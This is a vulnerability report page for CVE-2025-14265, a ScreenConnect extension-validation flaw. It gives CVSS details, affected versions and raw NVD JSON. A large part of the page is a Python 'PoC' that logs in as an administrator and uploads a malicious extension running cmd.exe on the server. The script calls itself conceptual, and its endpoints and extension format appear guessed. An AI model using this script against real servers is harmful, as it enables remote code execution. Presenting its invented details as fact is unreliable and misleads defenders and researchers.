Security Vulnerability Report
中文
CVE-2025-14265 CVSS 9.1 CRITICAL

CVE-2025-14265

Published: 2025-12-11 15:15:47
Last Modified: 2026-01-16 15:35:15
Source: 7d616e1a-3288-43b1-a0dd-0a65d3e70a49

Description

In versions of ScreenConnect™ prior to 25.8, server-side validation and integrity checks within the extension subsystem could allow the installation and execution of untrusted or arbitrary extensions by authorized or administrative users. Abuse of this behavior could result in the execution of custom code on the server or unauthorized access to application configuration data. This issue affects only the ScreenConnect server component; host and guest clients are not impacted. ScreenConnect 25.8 introduces enhanced server-side configuration handling and integrity checks to ensure only trusted extensions can be installed.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* - VULNERABLE
ScreenConnect™ < 25.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14265 ScreenConnect Extension Installation Exploit (Conceptual) # This is a conceptual PoC for educational and security testing purposes only import requests import json import base64 TARGET_URL = "https://target-screenconnect-server.com" API_ENDPOINT = f"{TARGET_URL}/Api/v1/Extension" # Malicious extension payload (base64 encoded) MALICIOUS_EXTENSION = """ <?xml version="1.0" encoding="utf-8"?> <Extension xmlns="http://www.screenconnect.com/Extension/2.0"> <Name>MaliciousExtension</Name> <Version>1.0.0</Version> <Publisher>Attacker</Publisher> <Description>Malicious extension for CVE-2025-14265</Description> <Code> using System; using System.Diagnostics; public class Exploit { public static void Execute() { // Arbitrary code execution Process.Start(new ProcessStartInfo("cmd.exe", "/c whoami")); } } </Code> </Extension> """ def exploit_cve_2025_14265(): """ Exploit for CVE-2025-14265: ScreenConnect Untrusted Extension Execution Requires valid administrator credentials """ session = requests.Session() # Step 1: Authenticate with admin credentials auth_data = { "Username": "admin", "Password": "admin_password" } auth_response = session.post(f"{TARGET_URL}/Api/v1/Login", json=auth_data) if auth_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Upload malicious extension headers = { "Content-Type": "application/octet-stream", "X-Extension-Name": "MaliciousExtension" } payload = base64.b64encode(MALICIOUS_EXTENSION.encode()).decode() upload_response = session.post( API_ENDPOINT, data=payload, headers=headers ) if upload_response.status_code == 200: print("[+] Malicious extension uploaded successfully") print("[*] CVE-2025-14265 exploited - arbitrary code execution achieved") return True else: print(f"[-] Extension upload failed: {upload_response.status_code}") return False if __name__ == "__main__": exploit_cve_2025_14265()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14265", "sourceIdentifier": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "published": "2025-12-11T15:15:46.863", "lastModified": "2026-01-16T15:35:15.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In versions of ScreenConnect™ prior to 25.8, server-side validation and integrity checks within the extension subsystem could allow the installation and execution of untrusted or arbitrary extensions by authorized or administrative users. Abuse of this behavior could result in the execution of custom code on the server or unauthorized access to application configuration data. This issue affects only the ScreenConnect server component; host and guest clients are not impacted. ScreenConnect 25.8 introduces enhanced server-side configuration handling and integrity checks to ensure only trusted extensions can be installed."}], "metrics": {"cvssMetricV31": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-494"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.8.0.9438", "matchCriteriaId": "19C5783B-C6B5-4181-80A0-082DF09B007B"}]}]}], "references": [{"url": "https://www.connectwise.com/company/trust/security-bulletins/screenconnect-2025.8-security-patch", "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.